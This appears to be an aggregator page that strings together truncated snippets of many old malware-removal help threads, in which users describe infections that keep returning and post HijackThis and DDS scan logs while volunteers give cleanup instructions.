If you have already posted this log at another forum or if you decide to seek help at another forum, please let us know. There is a shortage of helpers and taking the time of two volunteer helpers means that someone else may not be helped.

Please post your HijackThis log as a reply to this thread and not as an attachment. I am always leery of opening attachments so I always request that HijackThis logs are to be posted as a reply to the thread. I do not think that you are attaching anything scary but others may do so.

While we are working on your HijackThis log, please:
Reply to this thread; do not start another!
Do not make any changes on your computer during the cleaning process or download/add programs on your computer unless instructed to do so.
Do not run any other tool until ...

2 more replies
Relevance 49.2%

I have done everything to get rid of my recent popups including running spybot, adaware, microsoft Antispyware, Norton and Pandascan both in regular mode and safe mode. They keep on finding stuff, but after restarting, they still come back. I have also emptied the TEMP folder and cookies and temporary Internet files. I have included a HIJACK this log, hopefully someone can help. thanks.

Logfile of HijackThis v1.99.1
Scan saved at 6:34:55 PM, on 6/17/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\PROGRA~1\NORTON~1\NORTON~3\GHOSTS~2.EXE
C:\PROGRA~1\NORTON~1\NORTON~2\SPEEDD~1\NOPDB.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\fxssvc.exe
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\WINDOWS\GWHotKey.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe...

Answer:HJT Log because they keep coming back

16 more replies
Relevance 49.2%

okay, so yesterday i cleaned my pc with "malwarebytes anti-malware" and there were like 11 viruses. then i scanned after it, none, so i get up this morning and scan my pc because everything is going SO SLOW! and now i got 10 viruses. can anyone please help? yesterday i had like 2 injections, 2 clickers, 2 malware.packs, and like 6 agents.
here's my log for yesterday: http://pastebin.com/panEZfVS
and here's today's: http://rhymingcolors.pastebin.com/G7gJ51nr
please help. 5 of those kinds i've never seen before :/ please comment below
 

Answer:they keep coming back >:(

8 more replies
Relevance 49.2%

I can't get rid of this crap - I've run everything on here that people say. I have SAV installed and up to date, I have SpywareGuard installed, I have run HJT, I've run Ewido software, nothing can get rid of this - Every time I clean everything while in Safe mode and reboot, Spywareguard immediately starts popups saying a BHO has been added (such as C:\WINDOWS\system32\wvuvspq.dll) - I click remove BHO, and it comes back over and over...

Someone please help - this has totally destroyed my computer...
 

Answer:Someone please help - These BHO's keep coming back!!

Closing duplicate thread. Please continue to reply here: http://forums.techguy.org/malware-removal-hijackthis-logs/648572-please-help-my-hijackthis-log.html
 

1 more replies
Relevance 49.2%
Question: Keeps coming back!

I thought I wiped it off already but it's back AGAIN! And my SpyBot S&D is missing all sorts of components so it's not working right and it's the only one that has found any. The Microsoft one found one and deleted it but SpyBot found 16 but only deleted 2 before running into problems. EliteBar is back also. Help again!
 

Answer:Keeps coming back!

- Run ALL the steps in this Sticky thread READ ME FIRST BEFORE ASKING FOR SUPPORT: Basic Spyware, Trojan And Virus Removal. Make sure you check version numbers and get all updates.

- Very Important: Make sure you tell us the results from running the tutorial...was anything found? Were you unable to complete any of the scans?...Were you unable to download any of the tools?...Did you do the on-line scans as suggested? etc.
After doing ALL of the above you still have a problem:

- Download HijackThis 1.99.1

- Unzip the hijackthis.exe file to a folder you create named C:\Program Files\HJT

- Do NOT run Hijack This from the Desktop, a temp folder, or a sub-folder of C:\Documents and Settings, or choose to run it directly from the downloaded ZIP file.

- Before running HijackThis: You must close each of the following: your web browser, e-mail client, instant messenger, and programs like notepad, wordpad, MS Word etc. And any other unnecessary running programs.

- Run HijackThis and save your log file.

- Post your log as an ATTACHMENT to your next message. (Do NOT copy/paste the log into your post).
 

3 more replies
Relevance 49.2%

Greetings everyone I need some help.

First off... I have followed all the procedures listed on the READ ME thread that is asked and I STILL AM HAVING ISSUES.

I have Ad-Aware SE and with the VX add.

I have HiJackThis v1.99 and have followed the steps on that thread as well.

Here is the problem:

I run Ad-Aware every time I log on, and even in safe mode. It finds between 8 and 60 items. Mostly Malware and DataMiners. Then once I fix those I rescan and it comes up clean. However, I am still getting pop-ups, I have EnhanceMySearch, and when I log off and log back in... and re-run Ad-Aware I still have 8-60 items that show up and the same problem persists.

Can anyone help and point me in the right direction? It is a major annoyance. THANKS TO EVERYONE IN ADVANCE!!
 

Answer:It all just keeps coming back

Make sure you have HijackThis 1.99 and follow the guidelines on where to install it and how to post a log as an attachment. This is all covered in the sticky thread NO HIJACK THIS LOG FILES BEFORE READING THIS: HJT Tutorial & LOG File Posting

Now post a HijackThis log as an attachment to your message (Do not post the log inline). All running programs should be closed, including your web browser, e-mail. Close before running Hijack This!

To repeat: Do NOT run Hijack This from the Desktop, a temp folder, or a sub-folder of C:\Documents and Settings, or choose to run it directly from the downloaded ZIP file. Place it in its own folder, for example C:\Program Files\HJT
 

11 more replies
Relevance 49.2%

I'm the kind of person who just needs to turn UAC off. It's a great idea for the vast majority of regular users, though, so I'm not canning it, just asking some questions on how to actually turn it off so that it stays off.

I'm using Windows 7 x64 on a laptop that's just on its own, no domain, no group policy etc.

Anyway, I've got my UAC slider all the way down the bottom (and have rebooted), yet I still need to explicitly right-click and choose "Run as Administrator" if I need to run something as an administrator. (for example the command prompt, if I want to run "chkdsk c: /f" or "pskill explorer.exe" or use ProcessExplorer and look at the threads in system processes or whatever.) The thing is I want to run most of my stuff as administrator without the need to right-click each time. Just take a look at some of the crazy problems I see and need to work with: http://users.on.net/~MRIS/Problem_20090207_0701.mht

I know that I can tick "run as administrator" in the advanced tab for the shortcut that launches these as a work-around but I want it for all my sysinternals utilities, and there's lots of them. I'm also sick of clicking "show for all users" in things like task manager when I launch it via CTRL-SHIFT-ESC.

There's a Group Policy setting in the registry named:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
That I think is responsible.

However it always comes back and gets set...

Answer:UAC keeps coming back on all by itself.


MRIS said:
How do I track how this is getting there?

It turns out a file named "registry.pol" in this folder: C:\Windows\System32\GroupPolicy\Machine\ was doing it.

15 more replies
Relevance 49.2%

Hello, after removing numerous malwares, str.sys keep coming back even though i removed it several times. Here's the log, thanks for your help.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:22:19 PM, on 7/16/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Toshiba\Utilities\KeNotify.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Symantec AntiVirus\VPTray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\QuickTime\QTTask.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Synaptics\SynTP\SynToshiba.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe
C:\Program Files\Symantec AntiVirus\DoScan.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program...

Answer:Str.sys keep coming back, help!

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll...

2 more replies
Relevance 49.2%
Question: Keeps coming back

Ok guys, not sure what I keep missing but the 020 line keeps coming back and changing its name.

I have run CWS, ewido, Killbox (and delete after reboot), VirtumundoBegone
Logfile of HijackThis v1.99.1
Scan saved at 11:25:30 AM, on 1/22/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINDOWS\system32\drivers\KodakCCS.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Hijack This\TrojanHunter 4.2\THGuard.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Hijack This\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.comcast.net/
O3 - Toolbar: AIM Search - {40D41A8B-D79B-43d7-99A7-9EE0F344C385} - C:\Program Files\AIM Toolbar\AIMBar.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [NvCplDae...

Answer:Keeps coming back

10 more replies
Relevance 48.79%

I found a few suspicious files one day while i was clearing up files around in my hd.

backupuser.exe
_backupuser.exe
mydocuments.scr
recycled.scr
winzip.pif
photo.scr
c:\windows\appatch\lsass.exe
c:\windows\appatch\crss.exe
c:\windows\appatch\smss.exe
c:\recycled.scr

and a registry value
machine\software\microsoft\windows NT\CurrentVersion\WinLogon\Userinit: Userinit.exe,C:\WINDOWS\AppPatch\smss.exe,C:\WINDOWS\AppPatch\lsass.exe

Prior to posting this thread I have attempted to remove such files + registry value but some of the files and the registry value keep coming back after each reboot. Namely,
c:\windows\appatch\lsass.exe
c:\windows\appatch\crss.exe
c:\windows\appatch\smss.exe
c:\recycled.scr

After exhausting all my options I have come to seek help in this forums. Hope I made the right choice

Anyway, I have followed as per instructions from this post http://www.bleepingcomputer.com/forums/t/34773/preparation-guide-for-use-before-using-malware-removal-tools-and-requesting-help/ but received an error regarding the step involving root repeal. Don't know if it affects the scan but just gonna highlight the error.

Error - Invalid PE image found

Alrighty then, here comes the big wall of text

DDS (Ver_09-10-26.01) - NTFSx86
Run by User at 14:27:22.70 on Thu 11/05/2009
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_15
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.3326.2248 [GMT 8:00]
AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D...

Answer:Infection that keeps coming back

Hi, Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log. Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there. The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic. Once I receive a reply then I will return with your first instructions. Thanks

9 more replies
Relevance 48.79%

Hello. I first found Vundo on Saturday, April 11. I left my email client (Thunderbird) open for a few hours and came back to loads of popups. I tried calling Microsoft, and they assisted me with removal - or so I thought. Afterwards, I installed every Windows update, bought and installed Trend Micro's Internet Security Pro, and started scanning with Malwarebyte's Anti-Malware twice a day, at least. Every day since then I have found instances of Vundo (depending on which I use first, my Antivirus or MBAM). Each day it has a different name, too. It started out with Vundo.H, then Vundo.HGO, and today, I have Vundo.V. Finally, last night I ran a Kaspersky scan, and it found two files that I had never seen mentioned before - a trojan-downloader.Win32.fraudload.edj and packed.win32.Mondera.c. I can't locate these files, and neither can any of the other programs. Here are the requested files: DDS.txt and my Kaspersky log (041609KOS.txt), and the Attach.txt file. Thank you so much for your help.

DDS (Ver_09-03-16.01) - NTFSx86
Run by Jen at 12:33:38.40 on Thu 04/16/2009
Internet Explorer: 7.0.5730.11 BrowserJavaVersion: 1.6.0_11
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1022.443 [GMT -4:00]
AV: Trend Micro Internet Security Pro *On-access scanning enabled* (Updated)
FW: Trend Micro Personal Firewall *enabled*

============== Running Processes ===============
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C...

Answer:Vundo Keeps Coming Back

Please download The Comedian.exe to your desktop
Double click the program to run it. It will only take around several minutes to run.
It will do a series of tasks and tell you when each one is finished.
You will be prompted to press any key after each step
When it is done it will close and exit itself automatically.
You can delete The_Comedian.exe once it is finished

NEXT

Please download Malwarebytes' Anti-Malware from HERE or HERE
Note: If you already have Malwarebytes' Anti-Malware, just run and update it.. Then do a "Perform Full Scan"
Double Click mbam-setup.exe to install the application.
Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
If an update is found, it will download and install the latest version.
Once the program has loaded, select "Perform Full Scan", then click Scan.
The scan may take some time to finish, so please be patient.
When the scan is complete, click OK, then Show Results to view the results.
Make sure that everything is checked, and click Remove Selected.
When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Extra Note)
The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
Copy&Paste the entire report in your next reply.

Extra Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts, click OK to either and let MBAM proceed with the disinfec...

21 more replies
Relevance 48.79%

help...somebody please.
I just removed, with david's help, quite a few spyware files/a toolbar, as well as hclean. Now i get a message saying its back. Not to mention none of my spyware removal programs/norton are functioning properly all of a sudden. Here is my current HJT log:

Logfile of HijackThis v1.99.1
Scan saved at 8:19:41 PM, on 9/1/2005
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\csrss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINNT\system32\LEXBCES.EXE
C:\WINNT\system32\spoolsv.exe
C:\WINNT\system32\LEXPPS.EXE
C:\WINNT\Explorer.EXE
C:\WINNT\System32\CTSvcCDA.EXE
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
C:\WINNT\System32\nvsvc32.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINNT\System32\wdfmgr.exe
C:\WINNT\System32\MsPMSPSv.exe
C:\WINNT\System32\RunDll32.exe
C:\WINNT\System32\LXSUPMON.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINNT\System32\ctfmon....

Answer:Help Hclean Keeps Coming Back

blazingeingi - please continue in the first thread we were working on..........
Do not duplicate threads
David
 

2 more replies
Relevance 48.79%

I really need help. Whenever I scan with avast, it tells me there's a virus. I can't delete because it's being used by another program. So I got into safe mode and try to remove it. A while later after I deleted it and back into Windows, I scan again and it's back. It's always in the same place too:

C:\.....\Temporary Internet Files\Content.IE5\ZTNTM02A\movie[1]
HijackThis log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:50:08 PM, on 10/7/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\brss01a.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\Rundll32.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
C:\Program Files\Windows Media Player\WMPNSCFG.exe
C:\Program Files\Internet ...

Answer:Virus keeps coming back

Anyone?
 

1 more replies
Relevance 48.79%

Hi, I've had this problem for about a week now. Something seems to have gotten onto my computer. The main thing I notice is there is a program called brastk.exe that gets autorun on startup. There are also a number of startup entries in msconfig that reactivate even if I disable them. They are:
"rundll32" which runs a dll called drkly16j.dll
"dumprep 0 -u"
"brastk.exe"

If I delete brastk.exe or drkly16j.dll they just get recreated on the next boot. It appears that something besides a program is running at startup, possibly a service or a program running on shutdown. There is also something redirecting my google searches, and when I plug in my flash drive an autorun file gets created along with a file called system.exe.

EDIT: uh-oh, I just tried to run HJT and Spybot and neither will start! No error messages, just double clicking on the program and nothing happens.

Answer:Malware keeps coming back

Please download Malwarebytes Anti-Malware and save it to your desktop.
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan. If an update is found, the program will automatically update itself. Press the OK button to close that box and continue. If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.

On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen, click on the Show Results button to see a list of any malware that was found.
Make sure that e...

8 more replies
Relevance 48.79%

For the fourth time in the past few months, I have been experiencing strange pop-ups blocking my use of various programs. Twice, my IT dept. attempted removal of the virus, which looks like a virus warning from McAfee but will not allow removal or the use of the programs it is blocking. This time around it was blocking my use of Internet Explorer and Outlook.

A screen popped up and each time I tried to open the programs it would log a warning in the screen. The screen showed options for removing the items logged, however it would not respond to clicking any of the options and would only go away if I closed it out completely. If I did close it, as soon as I attempted to open those programs again, the warning would reappear. This is nearly identical to the last two or three times I have experienced this, with a couple weeks in between occurrences.

I rebooted several times and received a pop-up message from Windows saying "Windows has recovered from a serious error." The third time I rebooted, it actually allowed me to open these programs without the warning. The first two times it would not go away. This has happened a couple of times prior, where that message seemed to temporarily fix my issue.

Is this a real virus that is hidden in my computer? What can I do to remove it completely?

Answer:Virus that keeps coming back

Hello can you run an MBAm scan and post a log back .. Let's see what it may show.

Next run MBAM (MalwareBytes):

Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2
MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.
If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.

On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top...

7 more replies
Relevance 48.79%

Ok, so I scanned my computer with Avast and had some Trojan's and avast got a lot of them out, although my Firefox Process runs at 100% after about 2 minutes of using the app. So I assume I have some sort of a virus, I scanned my comp with Malwarebytes and it found some and deleted them but other malware viruses keeps coming back. I also did spybot S&D it found cookies, online Bitdefender found IRC-Worm and some other generic Trj's it deleted them, it seems avast did not detect some that Bitdefender did, RemoverIT Pro v4 detected lots and could not remove some (list is below), I have Vista 64bit so : RootRepeal screend didn't work. I did what the instructions told me to do and this is where I'm at. What I do most of the time when I have a virus that does not want to go away is I try safe mode scans or boot time scans, i do not have avast pro anymore so i can't do a boot time scan. Safe mode scan detected some of the following below
Avast
Sign of "JS:Downloader-FT [Trj]"
Sign of "Win32:Malware-gen"
Sign of "HTML:Framer-inf [Trj]"
Sign of "Win32:VB-LLP [Trj]"
Sign of "Win32:VB-LLP [Trj]"
Sign of "JS:FakeAV-AX [Trj]"
Sign of "HTML:IFrame-CJ [Trj]"

These were signs of the trj or malware, it seems to keep coming back so i can't find the main file infecting my pc. Also these things have got into my windows files.

Usually what i would do at this point would be to back up and reinstall windows, although i have an extra TB hard driv...

Answer:malware and Trj's keep coming back

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

Thanks and again sorry for the delay.

We Need to check for Rootkits with RootRepeal

Download RootRepeal from the following location and save it to your desktop.

First Location
Second Location
Third Location

Open on your desktop.
Click the tab.
Click the button.
Check all seven boxes: Push Ok
Check the box for your main system drive (Usually C:), and press Ok.
Allow RootRepeal to run a scan of your system. This may take some time.
Once the scan completes, push the button. Save the log to your desktop, using a distinctive name, such as RootRepeal.txt. Include this repor...

7 more replies
Relevance 48.79%

I have run spysweeper several times and have removed zestyfind.com Hijack and search.com exe and they keep coming back what do I do? How do I get rid of this stuff?
 

Answer:Help - Zestyfind Etc Keeps Coming Back

16 more replies
Relevance 48.79%

So there's obviously some virus on this computer that I'm not finding. I run malwarebytes and it says it cleans up Total Security from my computer, but then I reboot a couple of times and it's all back there again.

Can someone help me get this nasty thing off?

Thanks.

Answer:I keep cleaning it up and it keeps coming back

Hello and welcome to Bleeping Computer.

Please subscribe to your topic so that you will be notified as soon as I post a reply, instead of you having to check the topic all of the time. This will allow you to get an email notification when I reply. To subscribe, go to your topic, and at the top right hand corner by your first post, click the Options button and then click Track this topic. The bullet the immediate notification bubble. Then press submit.

Could you please post your Malwarebytes log for review? It can be found from the "Logs" tab in the program.

2 more replies
Relevance 48.79%

i use windows XP home edition, mozilla to browse

about a month ago someone else was using my laptop and a bunch of infections were detected by the free version of AVG. i removed all the selected infections then ran malwarebytes which detected some more things and removed them. after rebooting and running malwarebytes again my laptop seemed clean. however, every time i have run malwarebytes since then (about 3 times), there will be no objects detected. BUT, AVG will pop up and say there are infections on my computer. so today, suddenly a bunch of internet popups show up on my laptop and AVG also shows up with a bunch of infections. i'll list some of the trojans that have been detected by AVG.

Trojan horse Pakes.DDT
Virus found Win32/Heur
Trojan horse Downloader.Zlob_r.EX
Trojan horse SHeur2.YNO
Trojan horse Small.BHD
Trojan horse Pakes.DDT
Trojan horse SHeur2.ZZF
(then there were a bunch of tracking cookies detected by AVG)
Trojan horse Agent2.DZZ
Trojan horse Generic13.ADTY
Trojan horse Agent2.EJA
Trojan horse Downloader.Generic8.AHTY

Answer:trojan that keeps coming back?

Run scans with Super Antispyware free and MalwareBytes AntiMalware free. Links to download and instructions in link below. Be sure to update both programs after downloading, installing and before scanning.
http://www.bleepingcomputer.com/forums/ind...t&p=1087935
Follow the instructions and post the logs in your next reply. Note that Super Antispyware scan is best run in safe mode per instructions.

16 more replies
Relevance 48.79%

I've run into a relentless little piece of malware called AdAntiHS which I have not been able to get rid of in a friend's computer. There's barely any information on it from credible sources online. It digs its claws into the startup programs on Windows (running Windows 7) and won't let go. Not sure what kind of damage it's doing either.
 
I've disabled it from startup using msconfig, manually deleted it, and even ran MalwareBytes from a USB using Hiren's BootCD and removed it. But after restarting the computer it shows back up at C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. I've also deleted keys in the registry associated with AdAntiHS but to no avail upon restarting the computer. 
 
I noticed that upon deleting AdAntiHS from startup, a commonstartup file is created at C:\Windows\pss. I deleted that too. There is a registry key of appcompatCache which I understand is more like a reference or history of programs that have executed on the computer. Those are the only registry keys I have not deleted that make mention of AdAntiHS.
 
So far, I installed BitDefender on the computer which manages to catch AdAntiHS every time on startup, but even though I choose to delete the quarantined item, it comes back again on restart. So at best, I quarantine it on startup but I want to be able to permanently get rid of it.
 
Has anyone else encountered this piece of malware and been able to wipe it from their system?
 
Thanks in advance fo... Read more

More replies
Relevance 48.79%

Hi all, I'm at wit's end. My laptop (a Toshiba running XP) has one of the worst virus infections I've ever had to deal with. After at least 12 hours of researching, cleaning, rebooting, configuring and trying MalwareBytes, VIPRERESCUE, CrapCleaner, Spybot, BitDefender, and OTM by Oldtimer...the virus is still not gone.

I do know that I had several trojans, RootKit, Windows Antivirus Pro, and Protection System. MalwareBytes keeps finding threats and removing them every time I scan, but says that to completely remove all the files I have to reboot...and then the viruses apparently reinstall themselves upon rebooting. Immediately after rebooting I run another scan and it finds new files.

The problem HAS lessened, but I am still getting the Windows Antivirus Pro-type fake security warnings. The Protection System and Antivirus Pro files and folders are gone, but obviously something still remains because it hasn't stopped yet.

Protection System tried to add an entry to the registry before I closed for the last reboot, after it was 'wiped' by MalwareBytes, but Spybot caught it and I disallowed the change to the registry.

Could someone PLEASE help me finally root out where this thing is hiding so I can finally get rid of it for good?

Answer:Wiping it over and over and still coming back...HELP

Not sure why this was moved...I KNOW I'm infected, and with what...I just need help to get rid of it?!

I did run RootRepeal, and while I haven't taken any action yet, it found a hidden file in the system32\drivers folder called "hjgruitvogodyi.sys". It's in red in the list on RootRepeal, which makes me think it's a BAD thing...but I'm afraid to remove it without some kind of direction from someone who knows this stuff better than I do...

8 more replies
Relevance 48.79%

HJT for Check up
Ran adaware, ms antispyware beta, can't get to housecall or install wincritical updates.
I have a cd with sp2 which I will try to update.

Logfile of HijackThis v1.99.1
Scan saved at 12:11:35 AM, on 9/20/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Intel\Intel(R) Active Monitor\imontray.exe
C:\WINDOWS\System32\atiptaxx.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\WINDOWS\System32\devldr32.exe
